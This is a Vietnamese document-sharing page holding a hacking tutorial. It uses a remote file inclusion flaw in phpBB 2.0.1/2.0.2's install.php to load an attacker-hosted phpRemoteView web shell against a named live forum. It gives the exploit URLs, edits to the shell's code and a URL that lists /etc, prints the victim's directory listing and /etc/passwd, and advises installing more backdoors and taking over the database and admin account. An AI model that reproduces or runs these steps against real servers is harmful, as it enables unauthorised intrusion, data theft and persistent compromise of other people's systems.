Sử dụng REM VIEW để xem file trên Server

Số trang: 3 Loại file: pdf Dung lượng: 88.92 KB Lượt xem: 13 Lượt tải: 0

Jamona

Hỗ trợ phí lưu trữ khi tải xuống: miễn phí

Báo xấu

Xem trước 2 trang đầu tiên của tài liệu này:

Thông tin tài liệu:

Sử dụng REM VIEW để xem file trên Server :Lỗi sử dụng ở đây là lỗi trong file install.php của forum phpBB 2.0.1 và 2.0.2, các forum dạng này và dính lỗi này rát khổ biến trên NET và Luke đã không khó để có thể chọn random một site làm ví dụ http://www.cyberantics.net/forum/ Bước 1: Kiểm tra xem site đó còn file install.php hay không http://www.cyberantics.net/forum/install.php và may mắn câu trả lời là có. Chúng ta cần chú ý về mã nguồn PHP của nó một chút. QuoteVà đồng thời tôi nhập URL sau http://www.cyberantics.net/forum/install.php?phpbb_root_dir=http://www21.brinkster.co m/hainamluke/ kết quả nhận...
Nội dung trích xuất từ tài liệu:
Sử dụng REM VIEW để xem file trên ServerSử dụng REM VIEW để xem file trên Server :Lỗi sử dụng ở đây là lỗi trong file install.php của forum phpBB 2.0.1 và 2.0.2, các forumdạng này và dính lỗi này rát khổ biến trên NET và Luke đã không khó để có thể chọnrandom một site làm ví dụ http://www.cyberantics.net/forum/Bước 1:Kiểm tra xem site đó còn file install.php hay khônghttp://www.cyberantics.net/forum/install.php và may mắn câu trả lời là có.Chúng ta cần chú ý về mã nguồn PHP của nó một chút.QuoteVà đồng thời tôi nhập URL sauhttp://www.cyberantics.net/forum/install.php?phpbb_root_dir=http://www21.brinkster.com/hainamluke/ kết quả nhận được làQuote*Index of /var/www/html/forum/ REMVIEW TOOLS>> [dir commands]type name size owner:group perms mtimeDIR admin h ackman hackman drwxr-xr-x 20/05/02 08:28:36DIR contrib h ackman hackman drwxr-xr-x 20/05/02 08:28:37DIR db hackman hackman drwxr-xr-x 20/05/02 08:28:38DIR docs hackman hackman drwxr-xr-x 20/05/02 08:28:42DIR images hackman hackman drwxr-xr-x 20/05/02 08:28:45DIR includes hackman hackman drwxr-xr-x 20/05/02 08:28:47DIR language h ackman hackman drwxr-xr-x 20/05/02 08:28:47DIR templates hackman hackman drwxr-xr-x 20/05/02 08:28:51??/a> ??/a> common.php 5 316 hackman hackman -rw-r--r-- 20/05/02 08:28:36??/a> ??/a> config.php 271 hackman hackman -rw-r--r-- 23/05/02 19:17:13??/a> ??/a> extension.inc 810 hackman hackman -rw-r--r-- 20/05/02 08:28:42??/a> ??/a> faq.php 3 596 hackman hackman -rw-r--r-- 20/05/02 08:28:42??/a> ??/a> groupcp.php 45 881 hackman hackman -rw-r--r-- 20/05/02 08:28:42??/a> ??/a> index.php 14 298 hackman hackman -rw-r--r-- 20/05/02 08:28:47??/a> ??/a> install.php 33 617 hackman hackman -rw-r--r-- 20/05/02 08:28:47??/a> ??/a> login.php 6 996 hackman hackman -rw-r--r-- 20/05/02 08:28:50??/a> ??/a> memberlist.php 12 112 hackman hackman -rw-r--r-- 20/05/02 08:28:50??/a> ??/a> modcp.php 33 764 hackman hackman -rw-r--r-- 20/05/02 08:28:50??/a> ??/a> posting.php 34 073 hackman hackman -rw-r--r-- 20/05/02 08:28:50??/a> ??/a> privmsg.php 68 622 hackman hackman -rw-r--r-- 20/05/02 08:28:51??/a> ??/a> profile.php 3 834 hackman hackman -rw-r--r-- 20/05/02 08:28:51??/a> ??/a> search.php 40 471 hackman hackman -rw-r--r-- 20/05/02 08:28:51??/a> ??/a> update_to_201.php 24 899 hackman hackman -rw-r--r-- 20/05/02 08:29:08??/a> ??/a> upgrade.php 57 040 hackman hackman -rw-r--r-- 20/05/02 08:29:08??/a> ??/a> viewforum.php 23 181 hackman hackman -rw-r--r-- 20/05/02 08:29:09??/a> ??/a> viewonline.php 7 231 hackman hackman -rw-r--r-- 20/05/02 08:29:09??/a> ??/a> viewtopic.php 45 435 hackman hackman -rw-r--r-- 20/05/02 08:29:09phpRemoteView, version 2002-08-05. Free download - php.spb.ru/remviewNói vậy chắc các bạn cũng đã hiểu qua về lỗi này.Nếu các bạn thay mã nguồn của file remview kia bằng một file dạng DBManager thì bạncó th ể access tới toàn bộ DB của victim và lên Admin dễ dàng.Bây giờ tôi xin nói chi tiết hơn về cách sử dụng remview dạng này.Nếu bạn muốn sử dụng remview như là đang có một file thật trên server của victim thìbạn phải edit đoạn mã sau trong filehttp://www21.brinkster/hainamluke/includes/functions_selects.php########## FIND ########### $self=$HTTP_SERVER_VARS[PHP_SELF];################################## REPLACE ######### $self=http://www.cyberantics.net/forum/install.php?phpbb_root_dir=http://www21.brinkster.com/hainamluke/&;#########################Vậy là tạm ổn tuy nhiên cách sửa này chỉ áp dụng được với 50% công dụng của nó. Cụthể là ko dùng được remview tools như shell command, upload, edit ..Khi bạn nhập URL sauhttp://www.cyberantics.net/forum/install.php?phpbb_root_dir=http://www21.brinkster.com/hainamluke/&c=l&d=%2Fetc bạn sẽ có kết quả như MSVN làm với VDC UNIX server .Đối với các server khác các bạn nên dùng remview access sang các User, tìm điểm yếunhất của nó (chmod 666 trở lên) và đặt một vài con Backdoor khácĐây là một vài thông tin về server::::::::::::::/etc/passwd::::::::::::::root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/var/spool/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/bin/nologinnscd:x:28:28:NSCD Daemon:/:/bin/falsemysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashntp:x:38:38::/etc/ntp:/sbin/nologinrpm:x: ...